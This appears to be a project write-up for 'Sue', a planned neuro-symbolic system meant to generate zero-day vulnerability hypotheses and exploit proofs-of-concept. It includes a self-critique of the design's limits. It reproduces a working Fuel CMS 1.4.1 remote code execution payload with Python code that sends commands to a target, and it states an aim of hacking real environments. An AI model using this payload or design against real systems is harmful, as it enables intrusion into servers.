Is it possible for the AI (LLM + Symbolic Execution) to discover zero-day vulnerabilities automatically?
The final result should be the combination of a vulnerability hypothesis and a proof-of-concept (PoC) to validate it. These inputs and logic paths must be imagined by Sue.
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 1 & 2: DATA PIPELINE (INGESTION & TOKENIZATION) ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ PROCESS: Ingests raw exploits, CVEs, and patch diffs. Separates logic
│ from payload. Converts code into token embeddings (Vectors).
│
└─ OUTPUT: Fine-Tuning Dataset for the Neuro-Symbolic Model.
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 3: NEURO-SYMBOLIC CORE (LLM + FUZZING) ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ GROUP A: HYPOTHESIS GENERATOR (The "Artist")
│ └─ Model: Sue-LLM (Transformer)
│ └─ Generates vulnerability hypotheses, fuzzing seeds, and
│ mutation strategies (not just static code).
│
└─ GROUP C: COVERAGE VALIDATOR (The "Critic")
├─ Model: Reward Engine (Symbolic/Fuzzer)
│ └─ Answers: "Did this input reach a new code path or cause a crash?"
│
└─ FEEDBACK LOOP: Uses Reinforcement Learning to reward the LLM for
discovering divergent execution traces (Coverage-guided).
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 4: EXPLOIT ASSEMBLY & SYMBOLIC EXECUTION ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
└─ GROUP G1: SYNTHESIZER
└─ Model: Hybrid-Assembler
└─ Combines the neural hypothesis with symbolic constraints to
generate a functional Proof-of-Concept (PoC).
╔══════════════════════════════════════════════════════════════════════════════╗
║ PHASE 5: VIRTUAL VALIDATION & FEEDBACK LOOP ║
╚══════════════════════════════════════════════════════════════════════════════╝
│
├─ PROCESS: The PoC is executed in a strictly instrumented sandbox.
│
├─ GROUP G2: EXECUTION VALIDATOR
│ └─ Model: SandboxMonitor (Instrumentation)
│ └─ Answers: "Did we corrupt memory or bypass a check?"
│ -> Returns a high-fidelity Reward Score.
│
└─ GROUP G3: THREAT COMPARATOR
└─ Model: BehaviorAnalyst (Independent)
└─ Answers: "Is this a reproducible vulnerability or just noise?"
Here is the comprehensive list of models LLM or GAN with their detailed properties.
| Model Name | Phase | Group | Type | Trained With | Receives | Answers/Produces |
|---|---|---|---|---|---|---|
| PayloadArtist | 3 | P | Generator | Adversarially with feedback from PayloadCritic. |
A random noise vector. | Produces: A new, synthetic payload vector. |
| PayloadCritic | 3 | P | Discriminator (Independent, Pre-trained) | Vectors of real payloads from Exploit-DB. | A single payload vector (real or synthetic). | Answers: "How similar is this to real payloads?" |
| CodeArtist | 3 | C | Generator | Adversarially with feedback from CodeCritic. |
A random noise vector. | Produces: A new, synthetic code structure vector. |
| CodeCritic | 3 | C | Discriminator (Pre-trained) | Vectors of real exploit code structures. | A single code vector (real or synthetic). | Answers: "Is this a valid exploit code structure?" |
| ExploitAssembler | 4 | G1 | Generator (Assembler) | Assembled exploit scripts and validation feedback. | A payload vector and a code vector. | Produces: A full proof-of-concept script. |
| SandboxValidator | 5 | G2 | Validator (Independent) | Logs and network traffic from sandbox tests. | Execution logs from a single sandbox test. | Answers: "Did the exploit actually work?" |
| ThreatComparator | 5 | G3 | Validator (Independent) | Behavioral logs from real and generated attacks. | Logs from a single generated attack. | Answers: "Does this behave like a known threat?" |
I have been doing the courses https://tryhackme.com/ They are good, I recommend them, but you are not going to hack any real environment with it. (Nobody will going to enter any website where the system's workers know how to press the update button). We have extensive experience with neural networks.
To hack real environments you need to find a zero-day exploit, you can obtain:
- Through a honeypot: create a vulnerable artificial environment and have a MASTER hacker appear, attack you, collect the attack code there, and take day 0)
- Know a lot and fabricate the vulnerability (Everybody will die doing reverse engineering at a low level, before finding it)
Can you feed a Neuro-Symbolic AI with known previous exploit codes and have it end up generating day 0 exploits?
Note: In this project the word AI will not be used again, it is a marketing word, when programming IT MEANS NOTHING, every time a programmer says AI instead of Reinforcement Learning, Tensor Flow, pytorch o Decision Tree, a kitten dies XD
Originally, this project looked at GANs (Deep Convolutional Generative Adversarial Networks). In a GAN, two models are trained simultaneously by an adversarial process. Generator ("the artist") learns to create images that look real, while Discriminator ("the art critic") learns to differentiate real images from fake ones.
While we now use LLMs (Transformers) because code is sequential, we must also acknowledge that code requires logic, not just patterns. Therefore, we combine the "Creative" LLM with a "Logical" Symbolic Engine.
For more details on GAN technologyExample of creation images of a hybrid animal between: horses and zebras
Remember that although the examples are with images, an image (an image matrix 360 width, 360 length, 3 colors) and a python code (a tokenized matrix N tokens) for the AI is the same a data array.
However, because exploits are brittle (one wrong byte = failure), we cannot just "blend" them like images. We use Tokenization for the structure and Symbolic Analysis for the logic.
It is a code or set of codes that allows you to take advantage of an “extra function” of the attacked server. Attacked server is not aware that this extra function was randomly created during the development of the server.
Here we can see a good example of exploit https://www.exploit-db.com/exploits/50477 On servers with the Fuel CMS v1.4.1 library https://www.getfuelcms.com/
- If a search request is made http.serveratack.com/fuel/pages/select/?filter
- The payload is added behind
%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b %24%61%28%27 - After the payload a cmd command console code, for example simply list the files on the server
dir /l - It ends with the concatenation of the payload
%27%29%2b%27, the server will return the list of files, and any other cmd instructions, the machine is totally hacked.
The python code looks like this:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)From this explanation and this link https://www.exploit-db.com/exploits/50477 The Sweet is the Payload, the rest of the code is auxiliary python. The main idea is to create a Hybrid System to discover these Logic Flaws.
To create AI images of horses that look like zebras we need a large dataset of images of zebras and horses.
To create the payload you need to collect all the python exploits (in the first versions only python will be used, keep in mind that the languages will be expanded). 98% of known exploits are found on these sites:
- https://www.exploit-db.com/ OWASP exploit database It represents a broad consensus about the most critical security risks to web application
- https://nvd.nist.gov/vuln/full-listing USA National Vulnerability Database
- https://www.tenable.com/products/nessus Free or pay version
- https://www.rapid7.com/db Vulnerability & Exploit Database (use in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
- https://github.com/ can search GitHub by keywords such as “POC”, “vulnerability” key “cve”
For the python exploit codes to enter the Neural Network, tokenization (text-to-vector transformation) is required. Each language requires its own tokenization system, English, French... (more information on what tokenization is https://www.tensorflow.org/text/guide/tokenizers )
You can play tokenizing like chatGPT does herehttps://platform.openai.com/tokenizer
In the case of programming languages, their own tokenization mode is required. To carry out this process there are libraries and articles can help Tokenizer for Python source:
- https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ entire reading is recommended
- https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
- https://pypi.org/project/code-tokenize/
- https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings
Training. Actor (Generator) and Critic (Coverage Analyzer) The Actor ("Sue-LLM") must generate inputs, mutation strategies, and hypotheses.
The Critic (Coverage Analyzer) should answer the question: Did we reach a new state or crash the application?
To really check it, a real machine is required. This environment is complex. We do not just look for "valid code," we look for execution anomalies. The Reward Model must verify code coverage (like AFL++ or LibFuzzer). Training focuses on finding divergent paths. It would help a lot to understand the steps that the programmer-hacker took to discover the exploit.
*feel free to comment changes *
- Collect .py from DDBB exploits
- Inside the .py tokenize. One thing is the code and another the payload.
- Generation of the Coverage Engine (The Critic). This is not just a neural network, but a fuzzer that answers: did we find a new path?
- Creation of the Actor (The Generator/LLM). Should generate hypotheses and inputs to maximize the coverage found by the Critic.
- Evaluation, creation of real virtualized environments (Sandboxes) for testing the generated hypotheses. This tool will generate around 100000 inputs of which only one will work. The one that works XD
The GAN-to-LLM Analogy: Where It Breaks Down The core insight—that an image matrix and code token matrix are mathematically equivalent—is true but operationally misleading for exploit generation: Images vs. Exploits: Fundamentally Different Search Spaces
- Images: High-dimensional, continuous space, graceful degradation ("a slightly wrong pixel doesn't matter")
- Exploits: Low-dimensional semantically, discrete and brittle logic ("one missing byte = exploit fails")
The exploit search space is astronomically sparse compared to image generation. A payload must precisely match compiler behavior, memory layout, protocol state, target version, and runtime environment. Gradient-based search through this space has fundamental limitations.
Core Problem #1: Zero-Days Are Not Statistical Patterns A zero-day vulnerability is typically caused by:
- Logic bugs and unexpected state transitions
- Undefined behavior and memory safety violations
- Protocol edge cases and human error in implementation
These are not statistically frequent patterns in training data. An LLM trained on "exploits that worked" learns the form of exploits, not the reasoning that makes them work. It cannot invent causes it has never seen the consequences of.
Core Problem #2: Reward Model Cannot Judge Exploit Validity The current reward model asks: "Does this code look logically sound?" This is insufficient because:
- Exploits are environment-dependent (ASLR, DEP, CFI break synthetic exploits)
- Syntax correctness ≠ vulnerability
- Behavioral similarity ≠ exploitability
- A sandbox validator ≠ real-world ground truth
Modern mitigations break payloads that work in test environments. Many zero-days require precise heap grooming or state manipulation that cannot be reliably tested in isolation.
Core Problem #3: Reward Signal Sparsity The architecture assumes "generate around 100000 payloads of which only one will work." This is a 1-in-100,000 hit rate. For RLHF to converge with such sparse rewards:
- Credit assignment becomes nearly impossible
- Gradient updates are barely differentiable from noise
- Convergence time becomes prohibitively long
- The signal-to-noise ratio is fundamentally problematic for policy gradient methods
Core Problem #4: Missing Symbolic Grounding The current architecture is missing components essential for reasoning about discrete constraints: ❌ Static program analysis ❌ Dynamic taint tracking ❌ Symbolic execution ❌ Constraint solvers ❌ Coverage-guided fuzzing feedback
Without these, the Transformer is blind to the actual vulnerability mechanics. It cannot reason about why an exploit works, only recognize superficial patterns of exploits that did work.
Realistic Capabilities vs. Claims What Sue CAN Realistically Do: ✅ Payload variant generation (mutations of known exploits) ✅ Input synthesis and fuzzing strategy suggestions ✅ Crash discovery through guided exploration ✅ Bug hypothesis generation (structural/semantic guessing) ✅ Boilerplate code generation around known vulnerability patterns
What Sue CANNOT Realistically Do (Currently): ❌ True zero-day invention (requires semantic understanding of target source) ❌ Reliable RCE discovery without symbolic execution ❌ Autonomous exploitation without environment introspection ❌ Novel vulnerability detection without taint tracking
Path Forward: Neurosymbolic Integration For Sue to achieve its ambitious goals, the architecture should evolve toward a hybrid approach:
- Reframe Sue as a Vulnerability Hypothesis Generator rather than Exploit Generator. Sue outputs input structures, protocol states, and mutation strategies—not final payloads.
- Replace "looks valid" rewards with coverage-based signals: Track new code paths reached, unique crash types, divergent execution traces, and heap corruption indicators. This aligns with modern fuzzers (AFL++, libFuzzer).
- Integrate symbolic analysis layers: Sue's outputs should feed into static analysis, dynamic taint tracking, and coverage-guided fuzzing loops. The neural model guides the search; symbolic engines do the reasoning.
- Focus learning on vulnerability classes rather than exploit form: Parser confusion, deserialization, integer overflow, type confusion—structural patterns that symbolic tools can reason about and test.
Modern successful systems combine neural guidance with symbolic reasoning. Neural models excel at search space navigation; symbolic engines excel at constraint satisfaction. Sue should leverage both.
**We are currently developing privately, if you want to join the team please contact us. https://www.linkedin.com/in/luislcastillo/** ##### The name Sue The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field in the 1994 USA soccer World Cup⚽ (stadio Foxboro de Massachusetts, June 25, Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego, no other soccer player in history could stop him. “the tool that kills God soccer”. After that he never played again







